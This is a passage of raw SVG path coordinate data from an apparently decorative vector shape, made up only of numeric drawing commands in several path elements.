.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,